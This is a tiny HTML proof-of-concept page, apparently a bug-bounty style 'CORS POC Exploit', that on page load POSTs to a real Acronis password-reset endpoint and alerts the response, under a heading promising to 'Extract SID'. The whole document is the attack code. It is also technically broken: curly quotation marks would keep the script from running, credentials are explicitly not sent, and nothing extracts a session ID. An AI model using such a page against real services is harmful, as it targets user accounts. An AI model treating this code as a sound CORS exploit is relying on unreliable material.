<!DOCTYPE html>
<html>
<head>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 204) {
document.getElementById(“demo”).innerHTML = alert(this.responseText);
}
};
xhttp.open(“POST”, “https://account.acronis.com/v2/auth/password/reset", false);
xhttp.withCredentials = false;
xhttp.send();
}</script></head>
<body onload=”cors()”>
<center>
<h2>CORS POC Exploit legi </h2>
<h3>Extract SID</h3><div id=”demo”>
<button type=”button” onclick=”cors()”>Exploit</button></div></body></html>
